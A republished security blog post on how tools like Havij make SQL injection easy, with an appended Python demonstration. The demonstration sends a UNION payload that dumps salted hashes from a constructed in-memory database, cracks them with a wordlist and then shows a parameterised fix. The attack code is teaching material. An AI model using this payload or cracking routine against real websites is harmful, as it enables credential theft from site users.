
Troy Hunt is a Software Architect and Microsoft MVP for Developer Security. He blogs regularly about security principles in software development at troyhunt.com and is the author of the OWASP Top 10 for .NET developers series and free eBook of the same name. Troy is also the creator of the recently released Automated Security Analyser for ASP.NET Websites at asafaweb.com.

Hacking is Child's Play: How My 3 Year Old Performed a SQL Injection w/ Havij

10.15.2012
You know what really strikes me about a lot of the hacks we’ve seen lately? It just seems too easy. I mean we’re seeing a huge number of attacks (an unprecedented number, by some figures) and all too often the perpetrator is a kid. I don’t mean that in a relative sense to myself as I get older, I mean literally a child.

The problem, of course, is that many of these “hacks” have become simple point-and-shoot affairs using freely available tools. In the case of SQL injection, tools such as Havij mean that even if you don’t know your indexes from your collations or your UDFs from your DMVs, so long as you can copy and paste a URL you can be an instant “hacker”. The tool does the work of finding the injection point, working out the column count, enumerating tables and pulling the data out.

In fact I reckon it’s so easy that even my 3 year old can be a successful hacker. Turns out that’s not too far from the truth:

See how easy it is? Let’s move on and let me give you some more context around the ease and prevalence of these attacks. Firstly, remember that injection remains in the number one spot in the OWASP Top 10. What makes SQLi particularly dangerous is that it’s classified as both “easy” to exploit (which I think we can now all agree on) and with an impact of “severe”.

How severe? As in the example above, SQLi can readily be used to pull the stored credentials out of a vulnerable site, and even though these were salted and hashed, they’ll easily fall victim to a brute force attack: a salt defeats precomputed tables, but it does nothing to slow down a per-user dictionary attack against a fast hash like MD5 or SHA-1. Last year it was SQLi which brought down Sony Pictures and it was also allegedly SQLi that was behind this year’s LinkedIn breach. It is very, very prevalent.

A quick look through YouTube and you’ll see tutorials such as SQL Injecting With Havij which is notable not for its content, but rather for its presenter. As well as the guy sounding like he’s about 15 years old, it’s also clear he has very little idea of what a SQL database is or even how Havij actually works. This isn’t a criticism of the kid per se, it’s simply an observation about how accessible tools like Havij are. YouTube is littered with similar examples.

Now keep in mind that Havij is a tool that “helps penetration testers” and indeed ITSecTeam who makes the product is a legitimate security firm. But – and this is a big “but” – do a quick search on YouTube and you won’t find too many videos from penetration testers nor will you find many comments from people with a vocab broader than Ari’s. No, these are kids just looking to smash and grab whatever they can from vulnerable websites.

Of course Havij isn’t the only tool of this kind; products like sqlmap are also extremely popular and in this case, also open source. Unlike Havij it’s purely command-line based (probably a bit trickier for a 3 year old who can’t read yet), and also unlike Havij the audience commentating on it via YouTube and other forums is a little more, well, mature.

It’s interesting to look at the modus operandi of how these tools are being used. In this video about How To Use Havij we’re first shown how to unlock the Pro version with a cracked key, then how the author has a list of “Dorks” – clearly Google Dorks – with potentially vulnerable URL patterns. This amounts to nothing more than URLs with a query string parameter called “ID”, the kind of numeric lookup that is all too often concatenated straight into a SQL statement. These guys are simply trawling the internet, pointing Havij at potentially vulnerable URLs and giving it a shot. When it doesn’t work they’ll just move on to the next one.

And that’s the final bit of insight I’ll leave you with; being a target doesn’t mean being a large multinational or supporting a cause that doesn’t sit well with hacktivists nor does it mean presenting some sort of financial upside to those who can break through your security. No, being a target means being on the internet. End of story.

For those looking to protect their applications from SQLi, take a look at the first part of my series on the OWASP Top 10 for .NET developers: Injection.
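To make the whole chain concrete, here is an added example (not code from the original post or from Havij): a lookup that drops the “ID” query string value straight into SQL, the kind of UNION payload a tool like Havij arrives at once it has found the column count and guessed the table name, a small dictionary attack on the salted-but-fast hashes it pulls out, and the parameterised lookup that stops the injection. Everything in it is constructed for illustration: the table and column names, the salted SHA-1 scheme, the two accounts and their passwords, and the wordlist. An in-memory SQLite database stands in for the site.

```python
import hashlib
import sqlite3

# Constructed wordlist for the dictionary attack (not from the original post).
WORDLIST = ["letmein", "password123", "qwerty", "summer2012"]

# The UNION payload a point-and-shoot tool ends up sending once it knows the
# vulnerable SELECT returns two columns and has guessed the users table.
PAYLOAD = "1 UNION SELECT username, salt || ':' || password_hash FROM users"


def hash_password(salt: str, password: str) -> str:
    """Salted SHA-1, a fast hash: the salt only defeats precomputed tables."""
    return hashlib.sha1((salt + password).encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Constructed sample site: a public products table and a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT,
                            salt TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'Widget', 9.5), (2, 'Gadget', 19.5);
    """)
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [(1, "alice", "a1b2", hash_password("a1b2", "password123")),
         (2, "bob", "c3d4", hash_password("c3d4", "correct horse battery staple"))],
    )
    return conn


def product_lookup_vulnerable(conn, id_param: str):
    """The dork pattern: ?id=... concatenated straight into the statement."""
    sql = "SELECT name, price FROM products WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def dump_credentials(conn):
    """What the tool harvests: {username: (salt, hash)} via the UNION payload."""
    creds = {}
    for name, value in product_lookup_vulnerable(conn, PAYLOAD):
        # The genuine product row carries a float price; the injected rows
        # carry the 'salt:hash' string we asked for in the second SELECT.
        if isinstance(value, str) and ":" in value:
            salt, digest = value.split(":", 1)
            creds[name] = (salt, digest)
    return creds


def crack(creds, wordlist):
    """Per-user dictionary attack: the salt is known, so it slows nothing."""
    recovered = {}
    for user, (salt, digest) in creds.items():
        for guess in wordlist:
            if hash_password(salt, guess) == digest:
                recovered[user] = guess
                break
    return recovered


def product_lookup_safe(conn, id_param: str):
    """Two independent defences: type-check the input, then bind it as a
    parameter so the database never parses it as SQL."""
    try:
        product_id = int(id_param)
    except ValueError:
        return []  # a real handler would answer 400 or 404 here
    return conn.execute(
        "SELECT name, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal lookup:", product_lookup_vulnerable(db, "1"))
    dumped = dump_credentials(db)
    print("dumped:", dumped)
    print("cracked:", crack(dumped, WORDLIST))
    print("safe lookup with payload:", product_lookup_safe(db, PAYLOAD))
```

The vulnerable lookup hands back both accounts’ salt and hash alongside the product row; alice’s weak password falls to a four-word list while bob’s does not, which is the whole difference between the two. The parameterised version returns nothing for the payload because the bound value is compared as data, not parsed as SQL; the integer check in front of it is defence in depth, not the fix itself.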

Published at DZone with permission of Troy Hunt, author and DZone MVB. (source)

(Note: Opinions expressed in this article and its replies are the opinions of their respective authors and not those of DZone, Inc.)